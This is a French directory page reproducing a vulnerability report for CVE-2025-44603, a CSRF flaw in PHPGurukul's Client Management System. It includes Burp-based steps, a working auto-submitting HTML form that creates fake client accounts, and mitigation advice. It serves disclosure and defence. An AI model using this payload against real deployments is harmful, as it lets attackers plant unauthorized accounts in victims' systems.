Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — Preuve de concept démontrant une vulnérabilité CSRF dans un système de gestion de clients basé sur PHP, avec du code d'exploitation HTML et des stratégies d'atténuation pour les tests de sécurité d'applications web. | Kitploit
Outils/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

Preuve de concept démontrant une vulnérabilité CSRF dans un système de gestion de clients basé sur PHP, avec du code d'exploitation HTML et des stratégies d'atténuation pour les tests de sécurité d'applications web.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 anPas encore vérifié

CVE-2025-44603 (Vulnérabilité CSRF : conduit à la création de faux clients)

Nom du projet et URL du dépôt : https://phpgurukul.com/client-management-system-using-php-mysql/

Nom de la vulnérabilité : Cross-Site Request Forgery (CSRF)

Version affectée : V1.2

Introduction

Une vulnérabilité de type Cross-Site Request Forgery (CSRF) existe dans la fonctionnalité d'ajout de client du Client Management System développé par PHPGurukul. Le CSRF est une attaque par laquelle un utilisateur authentifié est amené à soumettre une requête malveillante à une application web. Cela peut conduire à l'exécution d'actions non autorisées au nom de l'utilisateur. Dans ce rapport, nous montrons comment le CSRF peut être utilisé pour créer de faux utilisateurs dans un Client Management System et suggérons des stratégies d'atténuation.

Environnement de test

  • Client Management System hébergé localement avec MySQL et PHP.
  • Fonctionnalité d'ajout de clients et de leurs services.

Étapes pour exploiter le CSRF

1. Se connecter en tant qu'admin

Utilisez les identifiants fournis pour vous connecter au Client Management System.

Connexion en tant qu'admin

2. Ajouter un nouveau client

  • Sélectionnez l'option Ajouter un client.
  • Saisissez les informations requises sur le client.

Ajout d'un nouveau client Saisie des informations du client

3. Intercepter la requête d'ajout de client

  1. Accédez au bouton Enregistrer.
  2. Configurez Burp Suite pour intercepter les requêtes.
  3. Cliquez sur Enregistrer et capturez la requête HTTP avant qu'elle n'atteigne le serveur.
  4. Envoyez la requête capturée dans l'onglet Repeater sans le cookie de session pour analyse.

Capture de la requête dans Burp Envoi au Repeater

Code CSRF pour de faux clients

Voici le PoC HTML pour l'attaque CSRF :

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Création de faux clients

  • Modifiez les informations existantes pour créer de faux clients

Ajout d'un faux utilisateur 1 Ajout d'un faux utilisateur 2

Test du PoC CSRF

  1. Ouvrez le lien du PoC CSRF généré dans un navigateur.
  2. La page web s'ouvre avec un bouton Soumettre.
  3. Cliquez sur Soumettre et la requête s'exécute, créant ainsi de faux clients.

Ouvrir le PoC dans le navigateur Cliquer sur le bouton de soumission

Confirmation de la création des faux clients

  • Après la soumission, les faux clients apparaissent dans le tableau de bord administrateur.

Faux clients créés Plusieurs utilisateurs créés

Stratégies d'atténuation

Pour prévenir les attaques CSRF, mettez en œuvre les mesures suivantes :

  1. Jetons CSRF
    • Utilisez des jetons anti-CSRF dans toutes les soumissions de formulaires et vérifiez-les côté serveur.
  2. Cookies SameSite
    • Définissez les cookies de session avec les attributs SameSite=Strict ou SameSite=Lax.
  3. Validation des en-têtes Referer et Origin
    • Validez les en-têtes Referer et Origin avant de traiter les requêtes.
  4. Vérifications de l'authentification utilisateur
    • Exigez des CAPTCHA pour les actions critiques afin de prévenir les attaques automatisées.
  5. Restreindre les méthodes HTTP
    • Utilisez POST pour les actions sensibles et évitez de traiter les requêtes GET ayant des effets secondaires.

Conclusion

Ce rapport démontre comment les vulnérabilités CSRF peuvent être exploitées pour créer des clients non autorisés dans un Client Management System. La mise en œuvre des stratégies d'atténuation suggérées contribuera à sécuriser l'application contre de telles attaques.

Télécharger l’outil